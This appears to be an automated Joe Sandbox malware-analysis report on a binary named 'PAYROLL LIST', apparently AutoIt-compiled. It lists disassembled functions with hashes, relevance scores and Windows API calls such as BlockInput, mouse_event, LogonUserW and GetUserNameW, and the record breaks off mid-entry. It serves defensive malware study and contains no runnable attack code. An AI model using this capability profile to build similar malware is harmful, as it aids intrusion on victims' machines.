Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d757b933e02a6e103207eff022f2c33b5dfa724be2987a4ef291b8c91c98974e
Instruction ID: b542af5395e6fb64d330e4af338e1aa2cbade8504ec0ad4e9b31cfe0670b4e4e
Opcode Fuzzy Hash: d757b933e02a6e103207eff022f2c33b5dfa724be2987a4ef291b8c91c98974e
Instruction Fuzzy Hash: BF628E75E00229DFCF24CF58C4806ADB7B2FF4A364F25816AD855AB391D734AE81CB90

Function 00A33B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON

Download Yara Rule

Strings

@, xrefs: 00A34176

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @
API String ID: 3728558374-2766056989
Opcode ID: 6dce7707e91995c1c4e1c591afbf0675c9e72b0bb6fea40c87240908c32414f0
Instruction ID: d6e1fabd5996d4d599d50cfa8aeb1a0e2ec1befe4b5b75d7eb9c8a57492bb155
Opcode Fuzzy Hash: 6dce7707e91995c1c4e1c591afbf0675c9e72b0bb6fea40c87240908c32414f0
Instruction Fuzzy Hash: E172A071E08209DFCF14DF98C981ABEB7B5EF48310F24806AF909AB251D775AE45CB91

Function 00A4D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 209070517d5f5772b16a6eac52b3ef4016ef56607c99add31c4997bb3686df4f
Instruction ID: 0172f5579773f856a0b47a7b2840b84bec7768fec2febe09cdc5f7310b3a3103
Opcode Fuzzy Hash: 209070517d5f5772b16a6eac52b3ef4016ef56607c99add31c4997bb3686df4f
Instruction Fuzzy Hash: D2320336D29F414DD7239635D822336A298AFF73D4F15D727E819B5EAAEB29C4C34200

Function 00A296C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 2d386549e25b1fc6999c1fdc947a9f6648997959492dcbdf4aa10683223fa8c9
Instruction ID: 693fc8a15fa4694145076e597055da60de7653c94efff774b7ef9233c5f237ec
Opcode Fuzzy Hash: 2d386549e25b1fc6999c1fdc947a9f6648997959492dcbdf4aa10683223fa8c9
Instruction Fuzzy Hash: C522AB716083109FDB24DF28D990BAFB7E4AF84710F10492DF89A9B291DB71E945CB92

Function 00A5038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90a26511920bd4a587defa5a2d048e61b15b4d6af3d764310a65e1c5a9d7ee85
Instruction ID: 0f55fcbf4a35486a5559719b5e79a0b826c2b7a0f46dcab16b340bd8f7fea1bc
Opcode Fuzzy Hash: 90a26511920bd4a587defa5a2d048e61b15b4d6af3d764310a65e1c5a9d7ee85
Instruction Fuzzy Hash: E7B1D121D2AF414DD723A6798831336B65CAFBB2D5F91D71BFC2A74D72EB2285834180

Function 00A6B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00A6B6DF

Part of subcall function 00A4344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00A6BDC3,00000000,?,?,?,?,00A6BF70,00000000,?), ref: 00A43453
Part of subcall function 00A4344A: __aulldiv.LIBCMT ref: 00A43473

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: d7f44781e0798de630fec1496ef765ad07a80652beb85fe667b58b59e3cd3757
Instruction ID: b235bf6e2d92587abb1b51463950e0682b99e4bb138aa185df1bde970794bf15
Opcode Fuzzy Hash: d7f44781e0798de630fec1496ef765ad07a80652beb85fe667b58b59e3cd3757
Instruction Fuzzy Hash: C621A276634511CBCB29CF68C481A92B7E1EB95310B248E6DE0E5CF2C0CB74BA45CB54

Function 00A76AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00A76ACA

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: a9cc1a785f38e60676495443e27ff4e733e067acbd43cf31b1d40d672e2102d3
Instruction ID: 21b6862b620be018508e0bd67166b40e1f2c5ca2de0d7e27ac352dd88b958cf3
Opcode Fuzzy Hash: a9cc1a785f38e60676495443e27ff4e733e067acbd43cf31b1d40d672e2102d3
Instruction Fuzzy Hash: 5EE04836210214AFC700EF99D904E96B7FCAF74751F04C426F949D7291DAB0F8048BA0

Function 00A674BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00A674DE

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: b65aaa726b0b8dcf1a4cb83efadee6097dc0071b127cd83d3d8c1398d0145eaa
Instruction ID: f0c447a2c45a964097e7a6e4ca388832f6dc439555a16665fd1e24c48e27b2d7
Opcode Fuzzy Hash: b65aaa726b0b8dcf1a4cb83efadee6097dc0071b127cd83d3d8c1398d0145eaa
Instruction Fuzzy Hash: E5D05EA053C30638EC2887248C0FF7E1938F3007C8F808289B082C94C1FC805802A132

Function 00A5B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00A5AD3E), ref: 00A5B124

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 57094083e1ee676af6ac9827f4530bb515846990221745383389ef9cbf1a8302
Instruction ID: f95e736134d84ea5219a211a1fba4905e04f2ada8f58d8f912b6076234f9fc89
Opcode Fuzzy Hash: 57094083e1ee676af6ac9827f4530bb515846990221745383389ef9cbf1a8302
Instruction Fuzzy Hash: 29D05E320A460EAEDF028FA4DC02EAE3F6AEB04700F408110FA12C50A0C771D532AB50

Function 00A9B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 00A9B352

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 9dd5e34639d90b951a7389808d728020c82ee5bebb246d470e4dba549e081912
Instruction ID: c2343369eb005b24125592e76ad4c9c21a25b001ecb19ff7d42f265e07fe40d9
Opcode Fuzzy Hash: 9dd5e34639d90b951a7389808d728020c82ee5bebb246d470e4dba549e081912
Instruction Fuzzy Hash: DFC04CB140010ADFCB51CBC0C9449EEB7BCAB14301F104096A146F1150D7709B859B72

Function 00A48189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00A4818F

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 66aa4b07612623f6b0337039a2e5c835700502928d496ef831b55baed6d78632
Instruction ID: 770f86663f4a46d6ab181562cbb4503d927592a83f900fbebb99024c653c184d
Opcode Fuzzy Hash: 66aa4b07612623f6b0337039a2e5c835700502928d496ef831b55baed6d78632
Instruction Fuzzy Hash: 11A0113000020CAB8F002B82EC088A83F2CEA022A0B000020F80E088208B22A8228AA2

Function 00A33200 Relevance: 1.0, Instructions: 986COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 0f47721701e68201a3a6a7f0f5ff0fe8d922a635e795ce8e6cc8dc1ae030511a
Instruction ID: 9ec4831d2da8c258b9301ccbf6a821e7422e3efb061c686a1284ab10db1e0746
Opcode Fuzzy Hash: 0f47721701e68201a3a6a7f0f5ff0fe8d922a635e795ce8e6cc8dc1ae030511a
Instruction Fuzzy Hash: 6B9268716083419FDB24DF18C580B6ABBF1BF88304F14886DF99A8B262D775ED45CB92

Function 00A2E3B0 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcd2d389050aa26a154281de33cb97d0e51541efdfa544cc9429c0a5bca13c51
Instruction ID: ee9a3eb0686cb35e55e6936185f8b7f9ef8b0bf52585be635d57923ee3c78874
Opcode Fuzzy Hash: dcd2d389050aa26a154281de33cb97d0e51541efdfa544cc9429c0a5bca13c51
Instruction Fuzzy Hash: 81229D70A14226CFDB24DF58E490AAEB7F1FF18304F148179E98A9B351E735AD81CB91

Function 00A293F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a90f032731ddce543c41ca8f9d7c14e653c036deba9b613caeb631d01428cb24
Instruction ID: 5816488516146df9e464b4bb5b4ae5d008a2c78d08a97754d889f785b35086d7
Opcode Fuzzy Hash: a90f032731ddce543c41ca8f9d7c14e653c036deba9b613caeb631d01428cb24
Instruction Fuzzy Hash: A4127D70A00219EFDF14DFA9EA81AEEB7F5FF48700F204529E806E7254EB35A915CB50

Function 00A2AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: 1c6441527cd1873aab6df26a1831218c87040bff9694a5bbeb80b768d5f89bd2
Instruction ID: 716b1f7e23a08303eacc92492f131773aec02ac8c99cc242fda508984e485c3f
Opcode Fuzzy Hash: 1c6441527cd1873aab6df26a1831218c87040bff9694a5bbeb80b768d5f89bd2
Instruction Fuzzy Hash: 19028070A00215EFDF14DF68EA91AAEB7F5EF44300F108479E806DB295EB35DA15CB91

Function 00A402A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: d7f413653ff578864e2bb8e30529e92ff17821b6186ec358916cdfd073a6688c
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: CBC1A4362051930EDF6D4739883483EFAA15AE17B172A076DE8B3CF4D5EF20D524E620

Function 00A406D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: 9a0f44ec308567a667669ced94175cb6e5628252001e330968d06c8c925d4c34
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: 41C193362051930EDF6D4739C87483EBAA15EE2BB171A176DE4B3CB4D6EF20D524E620

Function 00A3FE6F Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 1b794f9ea8dad2e28db9cc7d445e0a69d173d63ecbd62cb061befb7f84ac4c70
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: DBC1B3366151930EDF6D473D883493EBAA15AE27B1B2A077DE4B3CB4D5EF20C524E620

Function 00A3FA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 9b2477ae2850f87568988dbf4e32e7239f536f771c8cfd9faccaff2f026ee39f
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: F9C1B2326190930DDF6D473AC83443EFAA15AA2BB5B2A177DF4B2CB5D5EF20C524D620

Function 00A7A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00A7A2FE
DeleteObject.GDI32(00000000), ref: 00A7A310
DestroyWindow.USER32 ref: 00A7A31E
GetDesktopWindow.USER32 ref: 00A7A338
GetWindowRect.USER32(00000000), ref: 00A7A33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00A7A480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00A7A490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A7A4D8
GetClientRect.USER32(00000000,?), ref: 00A7A4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A7A51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A7A540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A7A553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A7A55E
GlobalLock.KERNEL32(00000000), ref: 00A7A567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A7A576
GlobalUnlock.KERNEL32(00000000), ref: 00A7A57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A7A586
GlobalFree.KERNEL32(00000000), ref: 00A7A591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A7A5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00AAD9BC,00000000), ref: 00A7A5B9
GlobalFree.KERNEL32(00000000), ref: 00A7A5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00A7A5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00A7A60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A7A630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A7A81D

Strings

AutoIt v3, xrefs: 00A7A4D0
DISPLAY, xrefs: 00A7A680
static, xrefs: 00A7A518, 00A7A66F
, xrefs: 00A7A7A3

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 90b973286f4a7702c7768b376ae52b8c78aa14cdbf23e774318c9e31f55385f2
Instruction ID: 8338cd02aee4f124b3a21a2b302171a09e67efe5534ed2168a5ab3e6697f435f
Opcode Fuzzy Hash: 90b973286f4a7702c7768b376ae52b8c78aa14cdbf23e774318c9e31f55385f2
Instruction Fuzzy Hash: 9C027075900155EFDB14DFA8DD89EAE7BB9FB49310F00C158F90AAB2A1C7709D42CB61

Function 00A8D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00A8D2DB
